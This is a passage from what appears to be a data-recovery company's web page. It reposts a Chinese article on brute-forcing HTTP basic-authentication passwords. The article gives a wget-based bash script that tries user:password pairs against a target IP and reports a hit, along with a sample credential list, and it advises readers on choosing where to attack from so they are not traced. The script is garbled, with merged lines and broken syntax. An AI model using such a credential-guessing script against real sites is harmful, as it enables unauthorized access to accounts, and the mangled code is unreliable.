• 軟體損壞資料救援
    誤分割、誤格式化、誤ghost、駭客攻擊、PQ調整失敗等...
  • 硬體損壞資料救援
    電路板芯片燒壞,不認碟、碟體書寫錯誤等...
  • 伺服器資料救援
    磁碟陣列RAID0 、RAID1、RAID1+0、NAS、SAN 、JBO
  • 筆電資料救援
    東芝、日立、邁拓、三星、富士通、昆騰、筆記型等...
  • RAID資料救援
    對RAID0、RAID1、RAID1E、RAID5E、RAID6等救援...
  • 硬碟資料救援
    IDE、SCSI、S-ATA介面的IBM、易拓,昆騰硬碟,移動硬碟...
目前位置: 首頁 > 新聞中心 > 儲存設備

分享:暴力破解HTTP驗證檢測頁面口令強度

【聲明:本文僅供技術交流,請勿用於非法操作!】

【賽迪網-IT技術報道】首先,你總得有像樣的字典吧。去國外網站上下Wordlist吧,或者自己寫個簡單的程序來生成字典。如果不會寫程序,呵呵呵呵,那就下載字典生成程序吧 。(不過網上下的wordlist,或者用網上下的字典生成程序生成的字典,好像都不好用)

其次,你總得有工具來運用字典幹活吧。可以從網上下載工具,比如大名鼎鼎的brutus。運行時的界面如下:

當然,也可以自己寫工具。筆者就寫了一個簡單的腳本來幹活:

#!/bin/bash#user_password_file=/root/wget_cracker_user_passwordwhile read user_password ; do user=$(user_password#:} password=$(user_password%:} wget -q -t 2 -T 15 --http-user=$user --http-password=$password -http://219.136.x.x:8080/tool.asp  if [ $? -eq 0 ] ; then  echo "OK I got an password:     user: $user ; password: $password !"        exit 0 fidone < $user_password_fileexit 0-bash-3.00# cat wget_cracker_user_password abc:adeeffafdeff:afkafsasfguest:affaewfguest:guestguest:afdasf

再次,你應該清楚:暴力破解不是SYN攻擊,IP 欺騙是不可能的,你的老巢在哪裡,受害者一眼就能看出來。所以,好好選擇「狙擊地」吧。搞不好會吃官司的哦。

最後,本人進行HTTP驗證暴力破解,只是驗證自己保護的WEB頁面口令的強度,絕不會去給別人的網站添麻煩。切記。

(

加入好友line@vga9721w
線上客服
@hd119